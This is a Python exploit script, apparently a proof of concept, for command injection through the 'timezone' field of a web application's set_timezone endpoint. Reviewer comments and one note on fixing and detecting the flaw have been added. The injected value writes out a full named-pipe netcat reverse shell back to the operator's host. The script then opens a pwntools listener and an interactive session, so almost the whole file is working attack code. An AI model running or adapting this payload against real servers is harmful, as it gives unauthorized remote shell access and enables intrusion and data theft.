#!/usr/bin/python3
import requests
import argparse
import json
from pwn import *
def exploit(target,localhost,localport):
    """Send a single POST to ``<target>/index.php/management/set_timezone``.

    The ``timezone`` form field is a backtick-quoted shell command string built
    from ``localhost`` and ``localport``; the request uses a 3 second timeout and
    every exception raised by ``requests.post`` is swallowed.  Nothing is
    returned and the response body/status is never inspected, so success or
    failure is only observable through the listener set up in ``__main__``.

    Args:
        target: Base URL of the application, used for the request URL and for
            the ``Origin``/``Referer`` headers.
        localhost: Address interpolated into the ``timezone`` field.
        localport: Port interpolated into the ``timezone`` field.

    NOTE(review): the weakness this request relies on is the server handing
    the ``timezone`` parameter to a shell.  The server-side fix is to accept
    only values from a known timezone list (e.g. ``zoneinfo.available_timezones``)
    and never pass the raw field to a shell; on the detection side, POSTs to
    this path whose ``timezone`` field contains shell metacharacters are the
    signal to alert on.
    """
    url = f'{target}/index.php/management/set_timezone'
    # Browser-like request headers; Origin and Referer are derived from target.
    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{target}',
        'Referer': f'{target}/index.php/management/datetime',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }
    # Form body: the timezone field is the injected value (not a timezone name).
    data = {
        'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc {localhost} {localport} 1>/tmp/pipe`'
    }
    try:
        response = requests.post(url, headers=headers, data=data, timeout=3)
    except:
        # Bare except: connection errors, the 3 s timeout and KeyboardInterrupt
        # are all silenced here; the response variable is never read.
        pass
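def get_external_ip():
    """Return this machine's public IP address as reported by ipinfo.io.

    Performs one GET against ``https://ipinfo.io/json`` (TLS certificate
    verification enabled) and reads the ``ip`` field of the JSON reply.

    Returns:
        The ``ip`` string from the ipinfo.io response.

    Raises:
        RuntimeError: if the service answers with a non-200 status.  The
            previous version returned a ``('Status:', code, ...)`` tuple here
            (the ``exit()`` after that ``return`` was unreachable), which the
            caller would then have used as if it were an address; raising
            instead lets the caller's ``except`` branch report the failure.
        requests.RequestException: propagated from the HTTP request itself
            (including the read timeout added below).
        ValueError, KeyError: propagated when the body is not JSON or has no
            ``ip`` key.
    """
    endpoint = 'https://ipinfo.io/json'
    # Bounded wait so an unreachable or stalled service cannot hang the script.
    response = requests.get(endpoint, verify=True, timeout=10)
    if response.status_code != 200:
        raise RuntimeError(
            f'Status: {response.status_code} Problem with the request. Exiting.'
        )
    data = response.json()
    return data['ip']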
if __name__ == "__main__":
    ## parse argument
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", action="store", help="Target url, http://localhost:9000", default=False, required=True)
    parser.add_argument("-l", "--localhost", action="store", help="Local IP address for reverse shell", default=False)
    # No type= is given, so localport stays a string (default "443").
    parser.add_argument("-p", "--localport", action="store", help="Local port for reverse shell", default="443")
    args = parser.parse_args()
    # --target is required=True, so argparse exits before this point when it is
    # missing; the `is not False` test (and the print_help branch below) can
    # therefore never take the else path in practice.
    if args.target is not False:
        if args.localhost is False:
            # get external ip address for listener
            try:
                args.localhost = get_external_ip()
            except:
                # Bare except: also catches KeyboardInterrupt/SystemExit here.
                print("Not able to get external IP address")
                # `sys` is not imported by name in this file; presumably it
                # comes from `from pwn import *` -- verify, otherwise this line
                # raises NameError instead of exiting.
                sys.exit(1)
        # running listener
        # pwntools listen(); receives the string port from argparse.
        l = listen(args.localport)
        # sending exploit payload
        exploit(args.target,args.localhost,args.localport)
        # waiting for a reverse connection
        try:
            s = l.wait_for_connection()
            s.interactive()
        except:
            # Any failure (no connection, Ctrl-C during the session) is silenced;
            # the listener is still closed by the finally clause.
            pass
        finally:
            l.close()
    else:
        parser.print_help()
        parser.exit()